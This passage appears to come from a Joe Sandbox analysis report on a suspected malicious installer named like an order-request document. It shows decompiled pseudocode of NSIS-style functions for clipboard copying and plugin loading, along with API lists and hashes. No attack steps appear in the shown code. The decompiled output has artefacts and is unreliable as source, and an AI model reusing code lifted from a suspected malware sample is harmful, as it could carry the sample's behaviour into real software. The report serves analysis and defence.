296 40542b-405431 call 40412b 292->296 293->296 294->279 295->295 297 4055f1-405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 295->297 296->290 299 405616-40563d SendMessageW 297->299 299->299 300 40563f-405653 GlobalUnlock SetClipboardData CloseClipboard 299->300 300->279
                                                C-Code - Quality: 96%
                                                			E004052D0(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				int _t101;
				long _t104;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a24; // 0x103b4
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405264, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						FindCloseChangeNotification(_t127); // executed
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							__eflags = _a12 - _t94;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							__eflags = _t95 - _t156;
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406054(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
							__eflags = _t101 - _t171;
							if(_t101 == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f40;
								_v44 = 0x1fff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
									__eflags = _a4 - _t156;
									_t171 = _t171 + _t104 + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
									__eflags = _t156 - _a8;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x7a7a0c - _t156; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x7a8a48, 8);
							__eflags =  *0x7a8acc - _t156;
							if( *0x7a8acc == _t156) {
								_t119 =  *0x7a0f18; // 0x86533c
								E00405191( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E004040CF(_t171);
							goto L25;
						}
						 *0x7a0710 = 2;
						E004040CF(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E0040415D(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a7a10, _t156);
						ShowWindow(_t169, 8);
						E0040412B(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8a50;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a7a10 = GetDlgItem(_a4, 0x403);
				 *0x7a7a08 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a24 = _t134;
				_v8 = _t134;
				E0040412B( *0x7a7a10);
				 *0x7a7a14 = E00404A2E(4);
				 *0x7a7a2c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004040F6(_a4);
				if(( *0x7a8a58 & 0x00000003) != 0) {
					ShowWindow( *0x7a7a10, _t156); // executed
					if(( *0x7a8a58 & 0x00000002) != 0) {
						 *0x7a7a10 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040412B( *0x7a7a08);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8a58 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}





































                                                0x004052d8
                                                0x004052de
                                                0x004052e8
                                                0x004052eb
                                                0x0040547a
                                                0x00405481
                                                0x0040549e
                                                0x004054a5
                                                0x004054a5
                                                0x004054ab
                                                0x004054b8
                                                0x004054d6
                                                0x004054d8
                                                0x004054d9
                                                0x004054e0
                                                0x00405536
                                                0x00405536
                                                0x0040553a
                                                0x00000000
                                                0x00000000
                                                0x0040553c
                                                0x0040553f
                                                0x00405542
                                                0x00000000
                                                0x00000000
                                                0x0040554c
                                                0x00405552
                                                0x00405554
                                                0x00405557
                                                0x00405659
                                                0x00000000
                                                0x00405659
                                                0x00405566
                                                0x00405571
                                                0x0040557a
                                                0x00405581
                                                0x00405585
                                                0x00405588
                                                0x00405591
                                                0x00405597
                                                0x0040559a
                                                0x0040559a
                                                0x004055aa
                                                0x004055b0
                                                0x004055b2
                                                0x004055bb
                                                0x004055be
                                                0x004055c5
                                                0x004055cc
                                                0x004055d4
                                                0x004055d4
                                                0x004055e2
                                                0x004055e8
                                                0x004055eb
                                                0x004055eb
                                                0x004055f2
                                                0x004055f8
                                                0x00405604
                                                0x0040560b
                                                0x00405614
                                                0x00405616
                                                0x00405619
                                                0x00405628
                                                0x0040562b
                                                0x00405631
                                                0x00405632
                                                0x00405638
                                                0x00405639
                                                0x0040563a
                                                0x0040563a
                                                0x00405642
                                                0x0040564d
                                                0x00405653
                                                0x00405653
                                                0x00000000
                                                0x004055b2
                                                0x004054e2
                                                0x004054e8
                                                0x00405518
                                                0x0040551a
                                                0x00405520
                                                0x00405522
                                                0x0040552b
                                                0x0040552b
                                                0x00405531
                                                0x00000000
                                                0x00405531
                                                0x004054ec
                                                0x004054f6
                                                0x00000000
                                                0x004054ba
                                                0x004054ba
                                                0x004054c0
                                                0x004054fb
                                                0x00000000
                                                0x00405504
                                                0x004054c9
                                                0x004054ce
                                                0x004054d1
                                                0x00000000
                                                0x004054d1
                                                0x004054b8
                                                0x004052f1
                                                0x004052f5
                                                0x004052fd
                                                0x00405301
                                                0x00405304
                                                0x00405307
                                                0x0040530a
                                                0x0040530d
                                                0x0040530e
                                                0x0040530f
                                                0x00405328
                                                0x0040532b
                                                0x00405335
                                                0x00405344
                                                0x0040534c
                                                0x00405354
                                                0x00405359
                                                0x0040535c
                                                0x00405368
                                                0x00405371
                                                0x0040537a
                                                0x0040539c
                                                0x004053a2
                                                0x004053b3
                                                0x004053b8
                                                0x004053c6
                                                0x004053d4
                                                0x004053d4
                                                0x004053d9
                                                0x004053e7
                                                0x004053e7
                                                0x004053ec
                                                0x004053ef
                                                0x004053f4
                                                0x00405400
                                                0x00405409
                                                0x00405416
                                                0x00405425
                                                0x00405418
                                                0x0040541d
                                                0x0040541d
                                                0x00405431
                                                0x00405431
                                                0x00405445
                                                0x0040544e
                                                0x00405457
                                                0x00405467
                                                0x00405473
                                                0x00405473
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32 ref: 0040532E
                                                • GetDlgItem.USER32 ref: 0040533D
                                                • GetClientRect.USER32 ref: 0040537A
                                                • GetSystemMetrics.USER32 ref: 00405381
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053A2
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B3
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C6
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D4
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053E7
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405409
                                                • ShowWindow.USER32(?,00000008), ref: 0040541D
                                                • GetDlgItem.USER32 ref: 0040543E
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040544E
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405467
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405473
                                                • GetDlgItem.USER32 ref: 0040534C
                                                  • Part of subcall function 0040412B: SendMessageW.USER32(00000028,?,00000001,00403F57), ref: 00404139
                                                • GetDlgItem.USER32 ref: 00405490
                                                • CreateThread.KERNELBASE ref: 0040549E
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054A5
                                                • ShowWindow.USER32(00000000), ref: 004054C9
                                                • ShowWindow.USER32(000103B4,00000008), ref: 004054CE
                                                • ShowWindow.USER32(00000008), ref: 00405518
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554C
                                                • CreatePopupMenu.USER32 ref: 0040555D
                                                • AppendMenuW.USER32 ref: 00405571
                                                • GetWindowRect.USER32 ref: 00405591
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AA
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E2
                                                • OpenClipboard.USER32(00000000), ref: 004055F2
                                                • EmptyClipboard.USER32 ref: 004055F8
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405604
                                                • GlobalLock.KERNEL32 ref: 0040560E
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405622
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405642
                                                • SetClipboardData.USER32 ref: 0040564D
                                                • CloseClipboard.USER32 ref: 00405653
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 4154960007-366298937
                                                • Opcode ID: 0f8705b072d52cd725f611a43b3dd691b97b3b0e52058a32ec52f25ce34b23e5
                                                • Instruction ID: d666eaf08a066d9579ddfae71cfc5fc92f0d71f62ebd549160e6baeed9b36ff9
                                                • Opcode Fuzzy Hash: 0f8705b072d52cd725f611a43b3dd691b97b3b0e52058a32ec52f25ce34b23e5
                                                • Instruction Fuzzy Hash: A3B16A71900608FFDF11AF64DD89EAE3B79FB48355F00842AFA41BA1A0CB784A51DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10001B18 Relevance: 25.0, APIs: 13, Strings: 1, Instructions: 544stringmemoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				void* _t246;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t246 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t319 = _t246;
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
